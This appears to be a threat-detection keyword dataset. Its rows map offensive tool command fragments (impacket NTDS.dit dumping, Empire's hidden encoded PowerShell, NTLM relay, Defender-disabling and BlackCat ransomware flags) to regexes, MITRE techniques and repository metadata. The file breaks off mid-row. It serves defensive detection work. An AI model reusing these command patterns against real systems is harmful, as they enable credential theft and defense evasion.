*",".{0,1000}\s\-\-nla\-redirection\-host\s.{0,1000}\s\-\-nla\-redirection\-port\s.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "* nntp-ntlm-info.nse*",".{0,1000}\snntp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* NoAmsi.ps1*",".{0,1000}\sNoAmsi\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* -NoBase64 *",".{0,1000}\s\-NoBase64\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --no-bruteforce *",".{0,1000}\s\-\-no\-bruteforce\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* --no-bruteforce *",".{0,1000}\s\-\-no\-bruteforce\s.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --no-bruteforce --continue-on-success*",".{0,1000}\s\-\-no\-bruteforce\s\-\-continue\-on\-success.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* --no-http-server -smb2support -t * -c *",".{0,1000}\s\-\-no\-http\-server\s\-smb2support\s\-t\s.{0,1000}\s\-c\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --nomain -d:exportDll --passL:*",".{0,1000}\s\-\-nomain\s\-d\:exportDll\s\-\-passL\:.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "* -NoP -sta -NonI -W Hidden -Enc *",".{0,1000}\s\-NoP\s\-sta\s\-NonI\s\-W\sHidden\s\-Enc\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "* -no-pass -dns-tcp -nameserver*",".{0,1000}\s\-no\-pass\s\-dns\-tcp\s\-nameserver.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "* -no-pass -just-dc-user *",".{0,1000}\s\-no\-pass\s\-just\-dc\-user\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -no-pass rid-hijack*",".{0,1000}\s\-no\-pass\srid\-hijack.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* -no-pass -usersfile *",".{0,1000}\s\-no\-pass\s\-usersfile\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* NoPowerShell.*",".{0,1000}\sNoPowerShell\..{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "* No-PowerShell.cs*",".{0,1000}\sNo\-PowerShell\.cs.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "* --no-ppid-spoof*",".{0,1000}\s\-\-no\-ppid\-spoof.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* -no-preauth * -dc-ip *",".{0,1000}\s\-no\-preauth\s.{0,1000}\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -NoPRo -wIN 1 -nONi -eN Sh33L*",".{0,1000}\s\-NoPRo\s\-wIN\s1\s\-nONi\s\-eN\sSh33L.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "* norouteconfig.sh*",".{0,1000}\snorouteconfig\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "* --no-sigthief*",".{0,1000}\s\-\-no\-sigthief.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* -notcontains * -notlike ""ntuser.dat*"" -and $_.Extension -ne "".tm*",".{0,1000}\s\-notcontains\s.{0,1000}\s\-notlike\s\""ntuser\.dat.{0,1000}\""\s\-and\s\$_\.Extension\s\-ne\s\""\.tm.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* --no-vm-kill*",".{0,1000}\s\-\-no\-vm\-kill.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --no-vm-snapshot-kill*",".{0,1000}\s\-\-no\-vm\-snapshot\-kill.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nping-brute.nse*",".{0,1000}\snping\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* nrpe-enum.nse*",".{0,1000}\snrpe\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* NSudo.exe*",".{0,1000}\sNSudo\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "* NSudo.exe*",".{0,1000}\sNSudo\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* NtCr3at3Thr3adEx @ *",".{0,1000}\sNtCr3at3Thr3adEx\s\@\s.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "* ntdll_unhooking.exe*",".{0,1000}\sntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* ntdll_unhooking.exe*",".{0,1000}\sntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* -ntds *.dit *-system *",".{0,1000}\s\-ntds\s.{0,1000}\.dit\s.{0,1000}\-system\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -ntds NTDS.dit -filters*",".{0,1000}\s\-ntds\sNTDS\.dit\s\s\-filters.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "* -ntds ntds.dit -system SYSTEM *",".{0,1000}\s\-ntds\sntds\.dit\s\-system\sSYSTEM\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Credential Access","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -ntds NTDS.dit -system SYSTEM -outputdir /*",".{0,1000}\s\-ntds\sNTDS\.dit\s\-system\sSYSTEM\s\-outputdir\s\/.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "* -ntds ntds.dit.save -system system.save LOCAL*",".{0,1000}\s\-ntds\sntds\.dit\.save\s\-system\ssystem\.save\sLOCAL.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --ntds-history*",".{0,1000}\s\-\-ntds\-history.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --ntds-pwdLastSet*",".{0,1000}\s\-\-ntds\-pwdLastSet.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -nthash * -domain-sid *",".{0,1000}\s\-nthash\s.{0,1000}\s\-domain\-sid\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -nthash * -spn * -domain-sid * -domain *",".{0,1000}\s\-nthash\s.{0,1000}\s\-spn\s.{0,1000}\s\-domain\-sid\s.{0,1000}\s\-domain\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -nthash *-domain-sid S-1-5-11-39129514-1145628974-103568174 -domain*",".{0,1000}\s\-nthash\s.{0,1000}\-domain\-sid\sS\-1\-5\-11\-39129514\-1145628974\-103568174\s\-domain.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* ntlm.py*",".{0,1000}\sntlm\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* ntlm.wordlist *--hex-wordlist*",".{0,1000}\sntlm\.wordlist\s.{0,1000}\-\-hex\-wordlist.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","19908","2745","2024-04-20T17:36:13Z","2015-12-04T14:46:51Z" "* ntlmdecoder.py*",".{0,1000}\sntlmdecoder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* ntlmdecoder.py*",".{0,1000}\sntlmdecoder\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "* --ntlm-proxy-ip * --ntlm-proxy-port *",".{0,1000}\s\-\-ntlm\-proxy\-ip\s.{0,1000}\s\-\-ntlm\-proxy\-port\s.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "* ntlmrecon*",".{0,1000}\sntlmrecon.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","0","N/A","N/A","5","455","68","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "* NTLMv1 captured *",".{0,1000}\sNTLMv1\scaptured\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "* ntlmv1.py*",".{0,1000}\sntlmv1\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 